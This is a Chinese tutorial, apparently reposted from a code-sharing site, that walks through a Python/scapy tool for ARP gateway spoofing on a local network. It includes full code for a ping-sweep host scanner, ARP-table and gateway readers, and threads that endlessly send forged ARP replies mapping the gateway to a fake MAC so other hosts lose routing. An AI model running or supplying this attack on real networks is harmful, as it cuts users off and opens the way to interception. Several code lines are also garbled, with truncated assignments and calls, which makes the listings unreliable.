Python利用scapy实现ARP欺骗的方法 一、实验原理。 本次用代码实现的是ARP网关欺骗,通过发送错误的网关映射关系导致局域网内其他主机无法正常路由。使用scapy中scapy.all模块的ARP、sendp、Ether等函数完成包的封装与发送。一个简单的ARP响应报文发送: eth = Ether(src=src_mac, dst=dst_mac)#赋值src_mac时需要注意,参数为字符串类型 arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)#src为源,dst为目标,op=2为响应报文、1为请求 pkt = eth / arp endp(pkt) 因为实验时发现主机并不会记录来自网关的免费ARP报文,无奈只有先想办法把局域网内存在的主机的IP-MAC映射关系拿到手,再逐个发送定向的ARP响应报文。 二、运行结果。 <1>先查看网关,确保有网: <2>因为socket需要sudo权限,所以以root权限跑起来: <3>因为代码写的比较繁琐,跑起来就比现场的工具慢很多,最后看下局域网内主机的arp表: 网关172.16.0.254的MAC地址已经从00:05:66:00:29:69变成01:02:03:04:05:06,成功! 三、实现代码。 代码过程:加载网关->扫描局域网内主机->扫描完成->加载arp表->发送ARP响应报文。 如图,代码分为六个部分。其中的arpATC.py为主程序,pingScanner.py为主机扫描器,arpThread.py为扫描线程,atcThread.py为发包线程,gtwaySearch.py获取网关,macSearch.py读取本机arp表。 <1> 通过os.popen函数调用ping,使用正则匹配返回字符串判断目标主机是否存在。 #!/usr/bin/python ''' Using ping to scan ''' import os import re import time import thread def host_scanner(ip): p = os.popen('ping -c 2 '+ip) string = pattern = 'Destination Host Unreachable' if,string) is not None: print '[*]From '+ip+':Destination Host Unreachable!'+time.asctime( time.localtime(time.time()) ) return False else: print '[-]From '+ip+':Recived 64 bytes!'+time.asctime( time.localtime(time.time()) ) return True if __name__=='__main__': print 'This script is only use as model,function:scanner(ip)!' <2> 同样,调用os.popen函数带入参数'arp -a'查看本地缓存的arp表信息。通过正则表达式截取每个IP对应的MAC地址,保存在字典arp_table里并返回。 #!/usr/bin/python ''' Using re to get arp table arp -a ? ( at c0:ee:fb:d1:cd:ce [ether] on wlp4s0 ''' import re import os import time def getMac(ip_table=[],arp_table={}): #print '[-]Loading ARP table...'+time.asctime( time.localtime(time.time()) ) p = os.popen('arp -a') string = string = string.split('\n') pattern = '(\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3})(.\s*at\s*)([a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2})' length = len(string) for i in range(length): if string[i] == '': continue result =, string[i]) if result is not None: ip = mac = arp_table[ip]=mac ip_table.append(ip) #else: #print '[*]macSearch.getMac:result is None' #print '[-]ARP table ready!'+'<->'+time.asctime( time.localtime(time.time()) ) return (ip_table,arp_table) if __name__=='__main__': table = getMac() ip_table = table[0] arp_table = table[1] for i in range(len(ip_table)): ip = ip_table[i] print '[-]'+ip+'<-is located on->'+arp_table[ip] <3> 通过使用正则截取os.popen('route -n')的返回值确定网关IP,把获取的网关IP与MAC当作元组返回。 #!/usr/bin/python ''' 'Kernel IP routing table\nDestination Gateway Genmask Flags Metric Ref Use Iface\n UG 100 0 0 enp3s0f1\n U 100 0 0 enp3s0f1\n' ''' import re import os import time from macSearch import * def find_Gateway(): p = os.popen('route -n') route_table = pattern = '(0\.0\.0\.0)(\s+)((\d+\.){1,3}(\d+))(\s+)(0\.0\.0\.0)' result =, route_table) if result is not None: #print '[-]Gateway is located on:' +'...'+time.asctime( time.localtime(time.time()) ) table = getMac() ip = table[0][0] mac = table[1][ip] return (ip,mac) else: #print '[*]arpATC.find_Gateway:result is None!' #print '[*]Gateway is no found!' return if __name__=='__main__': print '[-]Looking for Gateway...'+time.asctime( time.localtime(time.time()) ) gateway = find_Gateway() if gateway is not None: print '[-]Gateway is located on:' + gateway[0]+'('+gateway[1]+')'+'...'+time.asctime( time.localtime(time.time())) else: print '[*]Gateway is no found!'+gateway[0]+time.asctime( time.localtime(time.time()) ) <4> 考虑到ping扫描主机时遇到不存在的主机会等待过长的时间,使用多线程扫描就稍微会快一点。这里是通过继承、重写run方法实现功能的。因为不太会控制多线程,所以这里写死了,是四个线程平分255个可能存在的主机。 #/usr/bin/python import threading import time from gtwaySearch import * from macSearch import * from pingScaner import * class arpThread(threading.Thread): def __init__(self,tag_ip,number): super(arpThread,self).__init__() self.tag_ip = tag_ip self.number = number self.status = False def run(self): add = 0 if (self.number-1)==0: add = 1 start = (self.number-1)*64 + add #1-63,64-127,128-191,192-256 end = start + 64 for i in range(start, end): if i < 255: host = self.tag_ip.split('.') host[3] = str(i) host = '.'.join(host) host_scanner(host) self.status=True print '[-]Status of Thread_%d is '%self.number+str(self.status) #print '[-]Scan completed!' + time.asctime(time.localtime(time.time())) <5> 使用与arpThread.py中类似的方法继承、重写run方法实现多线程发包的功能。发包时源IP是指定的字符串“01:02:03:04:05:06”,源IP为获取的网关IP,目标IP和目标MAC皆为从本机arp表中获取的真实存在的主机IP与MAC。 #!/usr/bin/python import threading from scapy.all import ARP,Ether,sendp,fuzz,send class atcThread(threading.Thread): def __init__(self,table,gtw_ip,gtw_mac): super(atcThread,self).__init__() self.table = table self.gtw_ip = gtw_ip self.gtw_mac = gtw_mac def run(self): ip_table = self.table[0] arp_table = self.table[1] while True: for i in range(len(ip_table)): tag_ip = ip_table[i] tag_mac = arp_table[tag_ip] eth = Ether(src=self.gtw_mac, dst=tag_mac) arp = ARP(hwsrc='01:02:03:04:05:06', psrc=self.gtw_ip, hwdst=tag_mac, pdst=tag_ip, op=2) pkt = eth / arp sendp(pkt) #pkt = eth/fuzz(arp) #send(pkt,loop=1) <6> 代码的主程序,代码过程: 加载网关->扫描局域网内主机->扫描完成->加载arp表->发送ARP响应报文->等待。 (四线程) (四线程) 因为主程序是死循环,所以即便是攻击完成后也不会退出。可以在arpThread启动前加入for循环,这样就能无限发送了。 #!/usr/bin/python ''' ''' import os from gtwaySearch import * from arpThread import arpThread from atcThread import atcThread def atc_WrongGTW(gtw): src_ip = gtw[0] src_mac = gtw[1] print '[-]Start scanning hosts...' + time.asctime(time.localtime(time.time())) arpThread_1 = arpThread(src_ip,1) arpThread_2 = arpThread(src_ip,2) arpThread_3 = arpThread(src_ip,3) arpThread_4 = arpThread(src_ip,4) arpThread_1.start() arpThread_2.start() arpThread_3.start() arpThread_4.start() t = False while(t==False): t = arpThread_1.status and arpThread_2.status and arpThread_3.status and arpThread_4.status time.sleep(5) table = getMac() print '[-]Scan completed!' + time.asctime(time.localtime(time.time())) flag = raw_input('[-]Ready to start attacking:(y/n)') while(True): if flag in ['y', 'Y', 'n', 'N']: break print "[*]Plz enter 'y' or 'n'!" flag = raw_input() if flag in ['n','N']: print '[*]Script stopped!' else: atcThread_1 = atcThread(table,src_ip,src_mac) atcThread_2 = atcThread(table,src_ip, src_mac) atcThread_3 = atcThread(table,src_ip, src_mac) atcThread_4 = atcThread(table,src_ip, src_mac) os.popen('arp -s %s %s'%(src_ip,src_mac)) print '[-]'+'arp -s %s %s'%(src_ip,src_mac) print '[-]Strat attack...' atcThread_1.start() atcThread_2.start() atcThread_3.start() atcThread_4.start() if __name__=='__main__': gateway = find_Gateway() if gateway is not None: atc_WrongGTW(gateway) while True: pass else: print "[*]Can't find Gateway!" 以上这篇Python利用scapy实现ARP欺骗的方法就是小编分享给大家的全部内容了,希望能给大家一个参考,也希望大家多多支持中文源码网。